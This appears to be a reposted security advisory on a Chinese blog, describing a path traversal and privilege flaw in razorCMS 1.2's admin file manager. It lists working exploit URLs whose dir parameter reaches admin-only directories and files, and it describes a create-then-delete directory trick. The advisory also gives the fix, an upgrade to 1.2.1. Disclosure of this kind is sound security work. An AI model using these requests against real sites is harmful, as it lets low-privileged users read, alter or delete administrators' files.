razorCMS 1.2路径遍历0day

/ 6评 / 0

razorCMS 1.2 Path Traversal作者: chap0

下载地址: http://www.razorcms.co.uk/archive/core/

影响版本: 1.2

测试平台: Ubuntu

补丁: Upgrade to latest release 1.2.1


RazorCMS is vulnerable to Path Traversal, when logged in with
a least privileged user account the user can access the
administrator’s and super administrator’s directories and
files by changing the path in the url. The vulnerabilities exist
in admin_func.php


Path Traversal Details:

The following files and directories are vulnerable to Path Traversal
Attack including any files or directories that the admin or super admin
may create within these directories

http://bbs.admin8.us /admin/?action=filemanview&dir=razor_temp_logs/
http://bbs.admin8.us /admin/?action=filemanview&dir=backup/
http://bbs.admin8.us /admin/?action=filemanview&dir=/razor_data.txt
http://bbs.admin8.us /admin/?action=filemanview&dir=/index.htm


http://bbs.admin8.us /admin/?action=fileman&dir=razor_temp_logs/
http://bbs.admin8.us /admin/?action=fileman&dir=backup/
http://bbs.admin8.us /admin/?action=fileman&dir=/razor_data.txt
http://bbs.admin8.us /admin/?action=fileman&dir=/index.htm


An example would be if the super admin created a directory within razor_temp_logs
named sekrit which should not be accessible with a least privileged user, the
least privileged user can change the path as shown below:

http://bbs.admin8.us /admin/?action=filemanview&dir=razor_temp_logs/sekrit/

Which also works on files within those directories which the user should not have
access to which at this point gives the user access to view, edit, rename, move,
copy and delete the file.

示例.

http://bbs.admin8.us /admin/?action=filemanview&dir=razor_temp_logs/sekrit/sekrit.txt


Another vulnerability exist in this version of razorCMS, if a least privileged user creates
a directory with their logged in credentials, and then deletes the directory, the user will
then have access to the administrative directories and files.

《 “razorCMS 1.2路径遍历0day” 》 有 6 条评论

  1. bmi calculator说道:

    Bmi Calc

    Bmi Chart

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注